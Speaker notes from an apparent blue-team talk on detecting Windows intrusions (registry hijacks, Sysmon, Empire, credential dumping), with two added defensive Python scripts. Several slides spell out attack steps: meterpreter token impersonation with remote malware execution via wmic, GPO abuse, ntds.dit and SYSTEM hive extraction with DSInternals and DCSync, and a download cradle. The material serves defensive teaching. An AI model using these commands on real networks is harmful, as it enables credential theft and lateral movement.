  11. Need to monitor the Registry and installed patches because adversaries are looking and leaving signs of activities. Check autoruns for startup programs. Check the hash of known files that might be backdoored with an extra malicious program. Think BackdoorFactory! These reg keys will basically spawn your programs; as you can see this is very dangerous because these keys are commonly used by viruses and Trojans. [HKEY_CLASSES_ROOT\exefile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\comfile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\batfile\shell\open\command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="\"%1\" %*" [HKEY_CLASSES_ROOT\piffile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="\"%1\" %*" The key should have a value of "%1" %*; if this is changed to "server.exe %1 %*", the server.exe will be executed EVERY TIME an exe/pif/com/bat/hta is executed.
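One way to watch those shell\open\command defaults is to diff a `reg export` of them against an export from a known-good build, the "baseline (what is normal?)" approach from the deck. The following is an added example, not from the deck: a parser for .reg export text and an audit that reports each watched key as ok, changed or missing. Both exports below are constructed; the htafile baseline value is a placeholder path, since that key's legitimate default launches mshta.exe and should be taken from your own gold image rather than from a fixed string.

```python
"""Check the shell\\open\\command defaults the notes list against a known-good baseline.

Both inputs are text in .reg export format (read a real `reg export` file with
encoding='utf-16'). Added example; both exports below are constructed.
"""
import re

SECTION = re.compile(r"^\[(.+)\]$")
DEFAULT_VALUE = re.compile(r'^@="(.*)"$')

# Keys from the notes; HKLM\Software\CLASSES\... mirrors the same data, audit it the same way.
WATCHED_KEYS = [
    r"HKEY_CLASSES_ROOT\exefile\shell\open\command",
    r"HKEY_CLASSES_ROOT\comfile\shell\open\command",
    r"HKEY_CLASSES_ROOT\batfile\shell\open\command",
    r"HKEY_CLASSES_ROOT\piffile\shell\open\command",
    r"HKEY_CLASSES_ROOT\htafile\Shell\Open\Command",
]

# Constructed baseline export from a clean build. htafile's real default launches mshta.exe,
# so it is compared against the baseline rather than against a fixed "%1" %* string.
BASELINE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\comfile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\batfile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\piffile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]
@="\"C:\\Windows\\System32\\mshta.exe\" \"%1\" %*"
'''

# Constructed suspect export: batfile hijacked as the notes describe, piffile key deleted.
SUSPECT_REG = BASELINE_REG.replace(
    '[HKEY_CLASSES_ROOT\\batfile\\shell\\open\\command]\n@="\\"%1\\" %*"',
    '[HKEY_CLASSES_ROOT\\batfile\\shell\\open\\command]\n@="server.exe %1 %*"',
).replace('[HKEY_CLASSES_ROOT\\piffile\\shell\\open\\command]\n@="\\"%1\\" %*"\n', "")


def unescape(s):
    """Undo .reg escaping of backslashes and double quotes."""
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg(text):
    """Map each key (lower-cased) to its unescaped default (@) value."""
    values, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = DEFAULT_VALUE.match(line)
        if m and key is not None:
            values[key] = unescape(m.group(1))
    return values


def audit(suspect_text, baseline_text, keys=WATCHED_KEYS):
    """Return (key, status, baseline_value, actual_value); status is ok/changed/missing."""
    suspect, baseline = parse_reg(suspect_text), parse_reg(baseline_text)
    findings = []
    for key in keys:
        expected, actual = baseline.get(key.lower()), suspect.get(key.lower())
        status = "missing" if actual is None else "ok" if actual == expected else "changed"
        findings.append((key, status, expected, actual))
    return findings


def hijacked(suspect_text, baseline_text):
    """Just the keys a defender needs to look at."""
    return [(k, s, a) for k, s, _, a in audit(suspect_text, baseline_text) if s != "ok"]
```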
  12. https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 https://gist.github.com/bohops/f722f1a54d9ac1070350bdcaf2da618b Via Windows 7: https://www.youtube.com/watch?v=VytjV2kPwSg Via Task manager: https://www.youtube.com/watch?v=oPk5off3yUg Via Windows Server 2012 R2 https://www.youtube.com/watch?v=OgsoIoWmhWw
  13. This technique is in memory https://live.sysinternals.com/ logonsessions.exe OK enough CCDC stuff back to "What even looks bad? (Adversary Tactics)"
  14. Attackers who successfully installed such malware in a network will attempt to take control of the system within the network in the following sequence in order to collect confidential information, etc. 1. Initial investigation: Collect information of the infected machine 2. Reconnaissance: Look for information saved in the machine and remote machines within the network 3. Spread of infection: Infect the machine with other malware or try to access other machines
  15. Yes even if you don’t have central logging…
  16. What can you do? Enable Logging (even if you don't have central logging). Windows PowerShell cheat sheet https://www.malwarearchaeology.com/cheat-sheets
  17. https://www.malwarearchaeology.com/cheat-sheets
  18. You really need to log to find Bad! How do you find them?? A more advanced solution is Sysmon. Download and execute code: Powershell, Wscript, mshta, rundll32, Wmic, regsvr32, MSBuild, etc. Client side attacks are very common for a foothold into the network. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/T1193.md#atomic-test-1---download-spearphishing-attachment https://github.com/redcanaryco/atomic-red-team https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
  19. Detect .NET with Event Tracing for Windows (ETW) providers https://countercept.com/blog/detecting-malicious-use-of-net-part-2/ This could be used as a mechanism to discover suspicious assembly loading on a system, either in the form of legitimate assemblies being used maliciously, or potentially custom assemblies being loaded purely in memory. GhostPack Review https://youtu.be/eoh_yqLOenI https://posts.specterops.io/ghostpack-d835018c5fc4 https://github.com/GhostPack SharpUp is a C# port of various PowerUp functionality SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 SharpRoast is a C# port of various PowerView's Kerberoasting functionality SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subTee's .NET PE Loader https://astr0baby.wordpress.com/2018/07/25/ghostpack-quick-review/ Now for more Defender resources such as SANS Forensics!
  20. https://www.sans.org/security-resources/posters/ Until October something… I think 8th??? Not sure!
  21. Remote Access: RDP Map Network Shares with net use Remote Execution: PSEXEC, Schedule Tasks, Services, WMI/WMIC, PowerShell Remoting
  22. https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/attack_matrix/demo.gif https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix https://www.malwarearchaeology.com/cheat-sheets See it LIVE: https://mitre.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fraw.githubusercontent.com%2Folafhartong%2Fsysmon-modular%2Fmaster%2Fattack_matrix%2FSysmon-modular.json&scoring=false&clear_annotations=false
  23. https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix T1204 ATT&CK –Monitor the execution of and command-line arguments What about no logs things like stealing tokens?
  24. meterpreter > use incognito, meterpreter > impersonate_token CAMPUS\\Administrator, Then add more accounts, Mount file C:\Windows\system32>net use Z: \\192.168.140.137\C, Then Copy file copy "y:\Software\MALSoftware\MALClient\Installers\windows\installer\setup.exe" z:\Windows\system32\ Then run process shell wmic /node:host process call create “c:\windows\temp\malware.exe” Derivative Local Admin http://www.sixdub.net/?p=591 Abusing GPO Control https://wald0.com/?p=179 https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups Abuse: Add new local admin account. Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle). Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services Abuse: Create and configure new evil services. Policy Location: Computer Configuration\Preferences\Windows Settings\Registry Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways. Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown) Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments
  25. Here you can see how an account can be a Member of a group that has access to a computer that another account session is on that they could steal the token and get to other computers. User Sessions (where people are logged on) so we can steal password or impersonate: Andy Robbins BloodHound Session collection works: https://www.youtube.com/watch?v=q86VgM2Tafc
  26. Need to copy the ntds.dit file using vssadmin c:\windows\ntds.dit OR just use Invoke-NinjaCopy .\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination c:\test\system -verbose -computername workstationvm https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/ https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/ Then, you need the SYSTEM registry hive. Luckily, this can be directly saved, by running – reg save HKLM\SYSTEM <YOUR OUTPUT PATH HERE> Now that we’ve got both of those files, we can start extracting hashes! With the system extract and ntds.dit copy in hand, fire up PowerShell, it’s time for DSInternals! Running the following will extract the hashes in Hashcat format (necessary for the next step) – $key = Get-BootKey -SystemHivePath '<PATH TO SYSTEM HIVE HERE>' Get-ADDBAccount -All -DBPath '<PATH TO NTDIS.DIT HERE>' -BootKey $key | Format-Custom -View HashcatNT | Out-File <OUTPUT PATH HERE> -Encoding ASCII Now that we have a neat little hash extraction, we can get to comparing our users’ passwords against the Pwned Passwords dataset. 
https://www.troyhunt.com/pwned-passwords-now-as-ntlm-hashes/ https://github.com/thegeekkid/CompromiseCheck Because NTLM hashes aren't salted (do read the two answers there if you're wondering why), providing them in downloadable form means they can easily be used to compare to hashes within an AD environment just as they are. Script to compare: builds a hashmap of AD NTLM hashes/usernames and iterates through a second list of hashes checking for the existence of each entry in the AD NTLM hashmap https://github.com/DGG-IT/Match-ADHashes/ DSInternals PowerShell Module, which can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers. Dump all accounts at once, but this can cause heavy (=suspicious) replication traffic: Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1 https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/ DCSync: https://adsecurity.org/?p=1729 http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
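The hashmap comparison these notes describe, as an added example rather than the Match-ADHashes or CompromiseCheck scripts themselves: load the AD side (hashcat `user:hash` lines as the DSInternals HashcatNT view writes them, or pwdump-style `user:rid:lm:nt:::` lines) into a hash-to-accounts map, stream the Pwned Passwords NTLM list (`HASH:count`) through it, and also report hashes shared by several accounts, which is the password-reuse case from slide 31. Every hash below is made-up hex, not a real password hash.

```python
"""Compare AD NT hashes with the Pwned Passwords NTLM list, as the notes describe.

AD input is hashcat 'user:nthash' text (what the DSInternals HashcatNT view writes);
'user:rid:lm:nt:::' pwdump lines are accepted too. The breach list is 'NTHASH:count'
lines and is streamed, since the real file is very large. Added example: every hash
below is made-up hex, not a real password hash.
"""
from collections import defaultdict

AD_DUMP = """\
alice:0123456789abcdef0123456789abcdef
bob:fedcba9876543210fedcba9876543210
carol:0123456789abcdef0123456789abcdef
svc_backup:00112233445566778899aabbccddeeff
dave:1105:NO PASSWORD*********************:abcdefabcdefabcdefabcdefabcdefab:::
"""
PWNED_NTLM = """\
0123456789ABCDEF0123456789ABCDEF:34521
00112233445566778899AABBCCDDEEFF:7
ABCDEFABCDEFABCDEFABCDEFABCDEFAB:1
"""


def load_ad_hashes(text):
    """Build the hashmap: upper-case NT hash -> sorted list of accounts using it."""
    table = defaultdict(list)
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4:          # pwdump style: user:rid:lm:nt:::
            user, nthash = parts[0], parts[3]
        elif len(parts) == 2:        # hashcat style: user:nt
            user, nthash = parts
        else:
            continue
        if len(nthash) == 32 and set(nthash) <= set("0123456789abcdefABCDEF"):
            table[nthash.upper()].append(user)
    return {h: sorted(users) for h, users in table.items()}


def pwned_matches(table, pwned_lines):
    """(user, nthash, prevalence) for every account whose NT hash is in the breach list.

    NT hashes are unsalted, so a plain lookup is enough: the same password always
    produces the same hash, whoever set it and wherever it was breached.
    """
    hits = []
    for line in pwned_lines:
        nthash, _, count = line.strip().partition(":")
        for user in table.get(nthash.upper(), ()):
            hits.append((user, nthash.upper(), int(count or 0)))
    return sorted(hits)


def reused_hashes(table):
    """Hashes shared by more than one account (password reuse inside the domain)."""
    return {h: users for h, users in table.items() if len(users) > 1}


if __name__ == "__main__":
    ad = load_ad_hashes(AD_DUMP)
    for user, nthash, count in pwned_matches(ad, PWNED_NTLM.splitlines()):
        print(f"{user}: NT hash seen {count} times in breach data")
    for h, users in reused_hashes(ad).items():
        print(f"shared hash {h[:8]}...: {', '.join(users)}")
```

Against the real download, pass an open file object instead of `PWNED_NTLM.splitlines()` so the list is streamed line by line rather than read into memory.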
  27. http://woshub.com/defending-windows-domain-against-mimikatz-attacks/ Credential Guard has appeared, which isolates and protects LSASS from unauthorized access. Ok, let's move on to fileless malware detection and then the demo
  28. Ok, let's look at Empire (New-object System.net.Webclient).DownloadString() DownloadString() does not download any file to the disk but copies the content of the remote file directly into the memory of the victim machine. Agent and how Get-InjectedThread finds it video
  29. This video will show Inveigh Responder and then Get-InjectedThread to detect Empire in memory that had an injected process. Defenders can use PowerShell to detect obfuscation and injected processes that Empire uses. PowerShell Empire uses a default agent string that is detectable via network monitoring. For example, an attacker might call VirtualAllocEx to allocate space for malicious code to execute, and then utilize CreateRemoteThread or another API call to execute the malicious code within another application. Get-InjectedThread will retrieve the start address of each active thread, then determine the associated section properties. If there is an observed executable running within this section, it is deemed to be injected. But keep in mind that some legitimate applications perform process injection (and you might also run across an injected thread and alert). Detect CobaltStrike: https://github.com/JPCERTCC/aa-tools Volatility
  30. Monitor Host and Network activities. Referer logs in WebLogin for mal behavior. Watch Network access after Phish. If I was an adversary I would use your creds in OWA or VPN to get onto workstations to get a foothold and collect more data…
  31. Password Reuse (HaveIBeenPWND) Passwords that are easy to guess https://screencast-o-matic.com/u/vqZ/CrackHashResponder Go to 3:36 minutes into video https://screencast-o-matic.com/u/vqZ/LLMNR_HTTPCapture Responder running and SMBRelay running with payload and Listener for SMBRelayPayload to launch Meterpreter (1:03 Minutes in). https://g-laurent.blogspot.com/2017/03/multirelay-20-runas-pivot-svc-and.html?m=1 https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire <and see all the modules in Empire and the Agents. Exploiting Windows network with Responder and MultiRelay: https://www.youtube.com/watch?v=rjRDsXp_MNk
  32. https://www.malwarearchaeology.com/cheat-sheets Log-MD https://www.imfsecurity.com/
  33. https://www.sans.org/summit-archives/file/summit-archive-1536351477.pdf
  34. Scripts are great for signatures how about behaviors?
  35. DetectionLab to perform attacks and build defenses
  36. https://medium.com/@clong/introducing-detection-lab-61db34bed6ae Other Blue Team Tools are… GRR, Kansa, HELK Or just build a noSQL db and dump everything into it and have a data scientist build queries/db
  37. Mandiant MIR, etc
  38. Turn off LLMNR to stop Responder attack
  39. Free Tools to Review/Monitor/Log: MSFT Sysinternals: Sysmon, built-in Windows Audit logs, cmd line auditing, and PowerShell, Registry Monitoring (turn on) My Wiki: https://wiki.cac.washington.edu/display/~moorej1@washington.edu/IR+Sandbox+Powershell+Obfuscation+and+Detection+Techniques PowerShell v5 Security Enhancements & AD Security https://adsecurity.org/?p=2277 Ask your vendor for best practices or free tools that come with contract such as ATP BloodHound Map AD https://github.com/BloodHoundAD/BloodHound MSFT cloud https://cloudblogs.microsoft.com/microsoftsecure/2018/08/13/cybersecurity-threats-how-to-discover-remediate-and-mitigate/ https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4 RegMon: http://leelusoft.altervista.org/registry-live-watch.html https://sourceforge.net/projects/regshot/ Team should have a mission and plan to guide them on what is important to the business. Could implement the Cybersecurity Framework, or map the CIS Controls (core of NIST) to objectives. Map those to tickets to track events related to controls for later analysis. Cybersecurity Framework (CSF) Core: Identify, Protect, Detect, Respond, Recover. For an example of Detection Response team mappings: Protect: CIS 3, Secure Configuration of End-User Devices; Detect: CIS 4, Continuous Vulnerability Assessment & Remediation; Respond: CIS 6, Maintenance, Monitoring, and Analysis of Audit Logs
  40. Any questions?